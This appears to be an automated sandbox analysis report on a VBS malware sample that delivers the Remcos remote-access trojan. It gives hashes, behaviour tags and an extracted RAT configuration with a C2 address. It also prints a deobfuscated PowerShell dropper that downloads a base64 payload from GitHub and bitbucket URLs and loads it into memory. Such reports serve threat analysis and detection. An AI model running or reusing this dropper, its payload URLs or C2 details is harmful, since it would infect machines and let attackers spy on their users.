General

  • Target

    31agosto.vbs

  • Size

    480KB

  • Sample

    241004-2ablwszark

  • MD5

    b9dbaa8493f8539ec491076723a57f6d

  • SHA1

    c8b7f6625d77483f118ab91aa98a2e612feb714c

  • SHA256

    998c65637736fe8c32b932809868eb2ef60411273bb18d8f389b5f3e1c72ebc2

  • SHA512

    2d4a409d9fe88ac9aad7766db757a19b23ac6cd42650682de6db6d27ed3aa50ca84c7bb8af069458369d662f370c0361cbd4adb54fbebc694b8f7242443787d2

  • SSDEEP

    12288:kn7449lZb/RYfKsB5rGJxzJK37mBQHAIgfBkM0IzpyA22Xjidu2Bw41pk7/rXZ0z:e1Bcxo0

Malware Config

Extracted

Language
ps1
Deobfuscated
1
# powershell snippet 0
2
invoke-expression "$url = 'https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt'; $base64Content = (New-Object System.Net.WebClient).DownloadString($url); $binaryContent = [System.Convert]::FromBase64String($base64Content); $assembly = [Reflection.Assembly]::Load($binaryContent); [dnlib.IO.Home]::VAI(\"txt.socmer/sdaolnwod/sagcsed/fdhbfdz/gro.tekcubtib//:sptth\", \"desativado\", \"desativado\", \"desativado\", \"AddInProcess32\", \"\",\"\")"
3
4
# powershell snippet 1
5
$url = "https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt"
6
$base64content = (new-object system.net.webclient).downloadstring("https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt")
7
$binarycontent = [system.convert]::frombase64string($base64content)
8
$assembly = [reflection.assembly]::load($binarycontent)
9
[dnlib.io.home]::vai("txt.socmer/sdaolnwod/sagcsed/fdhbfdz/gro.tekcubtib//:sptth", "desativado", "desativado", "desativado", "AddInProcess32", "", "")
10
URLs
ps1.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

exe.dropper

https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt

Extracted

Family

remcos

Botnet

RemoteHost

C2

sost2024ene.duckdns.org:1213

Attributes
  • audio_folder

    MicRecords

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-0AGASP

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Targets

    • Target

      31agosto.vbs

    • Size

      480KB

    • MD5

      b9dbaa8493f8539ec491076723a57f6d

    • SHA1

      c8b7f6625d77483f118ab91aa98a2e612feb714c

    • SHA256

      998c65637736fe8c32b932809868eb2ef60411273bb18d8f389b5f3e1c72ebc2

    • SHA512

      2d4a409d9fe88ac9aad7766db757a19b23ac6cd42650682de6db6d27ed3aa50ca84c7bb8af069458369d662f370c0361cbd4adb54fbebc694b8f7242443787d2

    • SSDEEP

      12288:kn7449lZb/RYfKsB5rGJxzJK37mBQHAIgfBkM0IzpyA22Xjidu2Bw41pk7/rXZ0z:e1Bcxo0

    • Remcos

      Remcos is a closed-source remote control and surveillance software.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Run Powershell and hide display window.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Legitimate hosting services abused for malware hosting/C2

    • Suspicious use of SetThreadContext

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.